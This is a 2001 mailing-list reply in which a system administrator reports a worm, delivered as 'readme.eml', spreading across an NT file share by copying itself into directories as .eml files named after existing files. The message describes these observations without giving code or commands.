RE: New worm? 'readme.eml'

From: Mark Ng (hostmasterat_private)
Date: Tue Sep 18 2001 - 08:51:00 PDT

    I've just seen this infest an NT share.  I've isolated it to one drive (this
    machine is a fileserver with no access of it's own to the internet.)
    Further following behaviour, this worm copies itself into available
    directories, (I think using a client machine, as this is restricted to one
    drive only one department has access to) naming itself the same as other
    files in that directory, except as a .eml .  Upon opening in a text editor,
    the same content as described below by Pedro appears.